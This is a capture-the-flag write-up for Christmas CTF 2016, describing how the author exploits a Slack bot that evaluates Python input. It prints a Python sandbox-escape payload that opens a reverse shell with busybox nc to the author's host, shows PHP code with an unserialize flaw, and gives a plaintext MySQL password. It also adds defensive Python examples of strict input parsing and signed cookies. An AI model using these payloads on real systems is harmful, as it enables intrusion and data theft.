@Jinmo

Jinmo/README.md

Last active December 25, 2016 06:56
Christmas CTF 2016 LOLSTMAS

The organizers manually invited competitors to the hidebot.slack.com Slack workspace. They said I could use hidebot and hidebot2~7 via direct message (query); using them in a public channel was prohibited by the organizers.

To check the bot's functionality, they said we could use the @hidesbot help command.

```text
idk:
@hidesbot3 help

hidesbot3:
[*] Command list
- notice num
- 99dan num
- lolstat nick
- lol_notice

Currently, lolstat/lol_notice is not available.
Please use the website(http://52.175.145.142/lol/)
```

The website didn't seem to have any visible vulnerabilities.

  1. The notice command only accepts a number between 0 ~ 12.
  2. lolstat does not work.
  3. lol_notice works the same as the notice command.
  4. The 99dan command's result is interesting:
| request | response |
|---|---|
| `1` | `1*1=1~1*9*9` |
| `1a` | error |
| `(1)` | empty |
| `(1+1)` | empty |
| `(1+1a)` | error |

I suspected the argument was being evaluated by an interpreter. First I assumed it was Python.

| request | response |
|---|---|
| `__import__('os').system('ls')` | no hack |

?! no hack?

| request | response |
|---|---|
| `'\x39'` | empty |
| `0x9` | empty |
| `int('9')` | empty |
| `int("9")` | empty |
| `int('9')z` | error |

Now I was certain it was Python.

| request | response |
|---|---|
| `open('/etc/passwd')` | empty |
| `open('./flag')` | error |

Aww.. no flag. And there were some filters.

| request | response |
|---|---|
| `sys` | no hack |
| `__import__` | no hack |

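Judging from the responses above, the bot appears to hand the 99dan argument to an interpreter and screen it with a keyword blacklist (the distinct `no hack` reply even tells the sender which words the filter knows). Below is an added example of how such a chat command can be handled with no evaluation at all: the argument has to match a strict digit-only grammar and a numeric range, and every rejected input gets the same `error` reply. This is not the CTF bot's code (its source is not on the page); the `notice` range 0 ~ 12 is taken from the command list above, while the 1 ~ 9 range for 99dan, the function names and the mention-stripping logic are assumptions.

```python
import re

# Strict grammar for numeric arguments: ASCII digits only, no sign, no leading
# zero, no whitespace, no expressions. [0-9] is used instead of \d on purpose:
# \d would also accept non-ASCII digits such as fullwidth numerals.
_NUMBER = re.compile(r"0|[1-9][0-9]{0,2}")


def parse_bounded_int(text, lo, hi):
    """Return int(text) if text is a plain decimal in [lo, hi], else None.

    int() alone is too lenient (it accepts ' 9', '+9', '9_0' and unicode
    digits), so the string is matched against the grammar first.
    """
    if not isinstance(text, str) or not _NUMBER.fullmatch(text):
        return None
    value = int(text)
    if not lo <= value <= hi:
        return None
    return value


def dan_table(n):
    """Multiplication table line for n in the bot's 'n*i=n*i~...' format."""
    return "~".join(f"{n}*{i}={n * i}" for i in range(1, 10))


def handle_99dan(arg):
    # Assumption: 99dan takes 1..9. Anything else is rejected with one uniform
    # reply, so there is no "no hack" oracle and nothing is ever evaluated.
    n = parse_bounded_int(arg, 1, 9)
    if n is None:
        return "error"
    return dan_table(n)


def handle_notice(arg, notices):
    # The page says notice accepts 0 ~ 12; the index is then bounds-checked
    # against the actual list as well.
    idx = parse_bounded_int(arg, 0, 12)
    if idx is None or idx >= len(notices):
        return "error"
    return notices[idx]


def dispatch(line, notices=()):
    """Route a chat line such as '@hidesbot3 99dan 1' to its handler.

    The optional leading @mention is dropped; a command must then consist of
    exactly one keyword and one argument, so any argument containing spaces
    (or no argument at all) is rejected before a handler sees it.
    """
    parts = line.strip().split()
    if parts and parts[0].startswith("@"):
        parts = parts[1:]
    if len(parts) != 2:
        return "error"
    cmd, arg = parts
    if cmd == "99dan":
        return handle_99dan(arg)
    if cmd == "notice":
        return handle_notice(arg, notices)
    return "error"


if __name__ == "__main__":
    # Constructed sample inputs, including the probes sent to the real bot.
    for probe in ("1", "1a", "(1)", "0x9", "int('9')", " 9", "01"):
        print(repr(probe), "->", handle_99dan(probe))
    print(dispatch("@hidesbot3 99dan 1"))
```

With this shape, the observed `1a`, `(1)`, `0x9` and `int('9')` probes all collapse to the same `error`, so a tester learns nothing about the implementation from the reply, and there is no interpreter behind the command for a filter to protect.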
I tried the classic Python sandbox-escape payload used in CTFs.

```text
@hidesbot3 99dan [].__class__.__base__.__subclasses__()[59].__init__
(empty)
@hidesbot3 99dan [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache']
(empty)
...

@hidesbot3 99dan [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__.values()[12].popen('busybox nc <my ip> <my port> -e sh')
```

?! Shell achieved! The website's source code was there as a backup zip archive (b4ckup4u.zip). Database connection information is redacted.

config.php:

```php
<?php
$hostname = "localhost";
$user = "########";
$password = "########";
$dbname = "########";

$q = mysql_connect($hostname, $user, $password) or die("db error");
mysql_select_db($dbname, $q) or die("db error2");
?>
```

There was an unserialize vulnerability, and there seemed to be an intended MySQL query function.

read.php:

```php
<?php
include "config.php";
include "uclass.php";
$article_no = mysql_real_escape_string($_POST['no']);
$id = mysql_real_escape_string($_POST['uid']);
$pw = mysql_real_escape_string($_POST['upw']);
if(isset($_COOKIE['u']) && isset($article_no)){
	// the client-controlled cookie is decoded and passed straight to unserialize(),
	// so the client chooses the class and the values of its properties
	$obj = unserialize(base64_decode($_COOKIE['u']));
	ob_start();
	echo $obj->r();
...
```

uclass.php:

```php
<?php
include "config.php";
class Go
{
	// private, but unserialize() restores whatever value the serialized data carries
	private $t = "board";
	public function r()
	{
		// $t is interpolated directly into the query as the table name
		$q = "SELECT * FROM {$this->t} WHERE 1";
		$r = mysql_query($q) or die(mysql_error());
		$row = mysql_fetch_row($r);
		$arr = json_encode(array('subject'=>$row[1], 'content'=>$row[3]));
		return $arr;
	}
	public function b()
	{
		$q = "SELECT * FROM {$this->t}";
		$r = mysql_query($q) or die(mysql_error());
		$row = mysql_fetch_row($r);
		
	}
}
?>
```

I could have used the class to query the database, but I had a shell and there was a mysql client binary. There was a config.php in /var/www/html too.

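The flaw in read.php is that the cookie is trusted to describe an object: the client picks the class and every property, including the private `$t` that ends up as a table name in `Go::r()`. The fix is to never deserialize objects from a cookie at all: carry only data, authenticate it, and map any client-supplied label to a server-side allowlist. The following is an added example of that pattern, written in Python to match the other example on this page rather than in PHP; it is not the CTF site's code, and the cookie layout, the demo key and the `VIEWS` allowlist are assumptions.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo key. In a real deployment the key is loaded from
# configuration outside the web root, never embedded in source.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"

# The server decides which tables a cookie may ever name. The client supplies
# a short label; the label, not the client, is what selects the table.
VIEWS = {"board": "board"}


def issue_cookie(uid, view):
    """Build a data-only cookie: base64url(JSON body) + "." + hex(HMAC-SHA256)."""
    if view not in VIEWS:
        raise ValueError("unknown view")
    body = json.dumps({"uid": uid, "view": view},
                      sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(body).decode() + "." + tag


def parse_cookie(cookie):
    """Verify and decode a cookie; return its dict, or None on any failure.

    json.loads only ever produces plain data, so decoding cannot instantiate a
    class or run a method. The HMAC check runs before the body is parsed, and
    the decoded shape is validated field by field.
    """
    try:
        b64body, tag = cookie.split(".", 1)
        body = base64.urlsafe_b64decode(b64body)
        expected = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, tag):
            return None
        data = json.loads(body)
    except (ValueError, TypeError):
        return None
    if not isinstance(data, dict) or set(data) != {"uid", "view"}:
        return None
    if not isinstance(data["uid"], str) or data["view"] not in VIEWS:
        return None
    return data


def table_for_cookie(cookie):
    """The only path from a request to a table name goes through VIEWS."""
    data = parse_cookie(cookie)
    if data is None:
        return None
    return VIEWS[data["view"]]


def rewrite_body_unsigned(cookie, old, new):
    """Simulate a client editing the cookie body while keeping the old tag.

    Used here only to show that the edit is detected; without the HMAC this is
    exactly what the unserialize()-based cookie in read.php allowed.
    """
    b64body, tag = cookie.split(".", 1)
    body = base64.urlsafe_b64decode(b64body).replace(old, new)
    return base64.urlsafe_b64encode(body).decode() + "." + tag


if __name__ == "__main__":
    # Constructed sample session.
    good = issue_cookie("alice", "board")
    print("issued  ->", table_for_cookie(good))
    forged = rewrite_body_unsigned(good, b'"board"', b'"santa"')
    print("tampered ->", table_for_cookie(forged))
```

Even if the signing step were bypassed, `table_for_cookie` still cannot return anything outside `VIEWS`, so the two controls are independent: the HMAC stops tampering, and the allowlist stops any value that was never meant to be a table name from reaching a query.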
So I executed these commands:

```text
mysql -uhidebot -p'lolbot!@#' lol
SHOW TABLES;
(pressed Ctrl+D)
Tables_in_lol
santa
board
mysql -uhidebot -p'lolbot!@#' lol
SELECT * FROM santa;
(pressed Ctrl+D)
<flag>
```

I forgot the flag.
